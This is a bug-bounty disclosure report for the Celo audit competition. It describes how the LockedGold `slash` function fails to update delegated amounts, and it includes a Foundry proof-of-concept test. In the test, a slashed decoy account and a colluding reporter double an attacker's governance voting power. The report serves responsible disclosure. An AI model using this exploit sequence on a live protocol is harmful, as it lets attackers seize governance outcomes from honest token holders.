> For the complete documentation index, see [llms.txt](https://reports.immunefi.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://reports.immunefi.com/celo/37251-sc-critical-fraudulent-padding-of-governance-voting-power.md). # #37251 \[SC-Critical] Fraudulent padding of governance voting power **Submitted on Nov 30th 2024 at 02:15:23 UTC by @innertia for** [**Audit Comp | Celo**](https://immunefi.com/audit-competition/audit-comp-celo) * **Report ID:** #37251 * **Report Type:** Smart Contract * **Report severity:** Critical * **Target:** * **Impacts:** * Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results ## Description ## Brief/Intro `Slash` reduces or increases a user's `nonvoting balance`. However, there is no processing related to `delegete`.\ This can cause various vulnerabilities, but this report will introduce the fraudulent inflation of voting rights by attackers. ## Vulnerability Details The `slash` function increases or decreases the `nonvotingBalance` of the target account or reporter. However, if a delegation has occurred beforehand, the increase or decrease of the delegation amount must also be calculated. ``` _decrementNonvotingAccountBalance(account, maxSlash.sub(difference)); _incrementNonvotingAccountBalance(reporter, reward); ``` For example, if you look at the `lock` function, which is another process that increases `nonvotingBalance`, you can see that it also updates `DelegatedAmount`. ``` _incrementNonvotingAccountBalance(msg.sender, msg.value); _updateDelegatedAmount(msg.sender); ``` `slash` does not do this, so there is no consistency between the increase/decrease in `nonvotingBalance` and `DelegatedAmount`. This can lead to various attack methods and calculation errors, but I would like to introduce one example, which is inflating the number of voting rights. I will explain the step-by-step process while implementing it within the POC. ## Impact Details * Inflating the number of votes * Withdrawing tokens while maintaining the number of votes etc. ## References ## Proof of Concept ## 3. Proof of Concept Please add the following `test_GovernanceVotingPowerFraudulentlyInflated` function to the `LockedGoldTest_slash` contract in `LockedGold.t.sol`. ``` function test_GovernanceVotingPowerFraudulentlyInflated() public { //attackerMain: account that gathers voting power address attackerMain = actor("attackerMain"); address attackerMainSigner; uint256 attackerMainSignerPK; //attackerSub: A decoy account address attackerSub = actor("attackerSub"); address attackerSubSigner; uint256 attackerSubSignerPK; uint256 percentToDelegate = 100; uint256 delegatedAmount = (value * percentToDelegate) / 100; vm.prank(attackerMain); accounts.createAccount(); vm.prank(attackerSub); accounts.createAccount(); (attackerMainSigner, attackerMainSignerPK) = actorWithPK("attackerMainSigner"); (attackerSubSigner, attackerSubSignerPK) = actorWithPK("attackerSubSigner"); vm.deal(attackerSub, 10 ether); //Lock celo by attackersub lockCelo(attackerSub, value); //100% delegation from attackerSub to attackerMain delegateCelo(attackerSub, attackerMain, 100); //By delegation,all of the VotingPower has been given to attackerMain. assertEq(lockedGold.getAccountTotalGovernanceVotingPower(attackerSub), 0); assertEq(lockedGold.getAccountTotalGovernanceVotingPower(attackerMain), value); //The attackerSub carries out an act that deserves a slash, and reports it to the Slasher. //The important thing is that this reporter is also an account related to the attacker. uint256 penalty = value; uint256 reward = value; address[] memory lessers = new address[](1); lessers[0] = address(0); address[] memory greaters = new address[](1); greaters[0] = address(0); uint256[] memory indices = new uint256[](1); indices[0] = 0; vm.prank(downtimeSlasher); lockedGold.slash(attackerSub, penalty, reporter, reward, lessers, greaters, indices); //reward is given to the reporter assertEq(lockedGold.getAccountNonvotingLockedGold(reporter), reward); //The reporter (the attacker's related account) who received the reward delegates this to attackerMain delegateCelo(reporter, attackerMain, 100); //The attackerMain has GovernanceVotingPower that has been fraudulently inflated. //In this sequence, the locked celo is only the `value`. In other words, GovernanceVotingPower should only exist for the `value`. //However, by taking advantage of the flawed implementation of `slash`, GovernanceVotingPower can be padded to the value + reward (in this example, it is doubled). //This is a manipulation of voting rights, and is a significant damage to the protocol. assertEq(lockedGold.getAccountTotalGovernanceVotingPower(attackerMain), value + reward); } ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://reports.immunefi.com/celo/37251-sc-critical-fraudulent-padding-of-governance-voting-power.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.